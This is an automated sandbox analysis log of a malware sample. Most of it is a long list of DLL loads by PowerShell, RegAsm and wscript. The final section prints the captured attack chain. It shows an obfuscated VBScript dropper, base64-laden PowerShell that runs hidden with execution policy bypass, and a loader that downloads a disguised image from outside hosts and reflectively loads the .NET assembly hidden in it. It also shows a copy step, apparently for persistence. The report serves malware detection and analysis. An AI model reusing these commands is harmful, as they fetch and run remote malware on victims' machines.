Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Source: C:\Windows\System32\wscript.exe	Automated click: OK
Source: C:\Windows\System32\wscript.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

VBScript performs obfuscated calls to suspicious functions

Data Obfuscation

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") estrige = ("$(@(?(@?@?dig@?@? = '") & iristomia & "'" estrige = estrige & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" estrige = estrige & "[??}@*y??}@*" estrige = estrige & "t?*(?" estrige = estrige & "m.(@(?(@?@?" estrige = estrige & "nv?*(?r" estrige = estrige & "t]:" estrige = estrige & ":Fr@?@?" estrige = estrige & "mba??}@*" estrige = estrige & "?*(?64??}@*tring( $(@(?(" estrige = estrige & "@?@?d" estrige = estrige & "ig@?@?.r?*(?" estrige = estrige & "@%*:&la" estrige = estrige & "(@(?(?*(?('" estrige = estrige & "DgTr?*(?" estrige = estrige & "','" estrige = estrige & "A" estrige = estrige & "') ))" estrige = estrige & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" estrige = Replace(estrige,"@%*:&","p") estrige = Replace(estrige,"(@(?(","c") estrige = Replace(estrige,"?*(?","e") estrige = Replace(estrige,"@?@?","o") estrige = Replace(estrige,"??}@*","s") sumelga1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " sumelga1 = Replace(sumelga1,"(@(?(","c") sumelga1 = Replace(sumelga1,"??}@*","s") sumelga1 = Replace(sumelga1,"@?@?","o") sumelga1 = Replace(sumelga1,"@%*:&","p") sumelga = sumelga1 & """" & estrige & """" Cama.Run sumelga, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/FIwXa", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTreb

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDg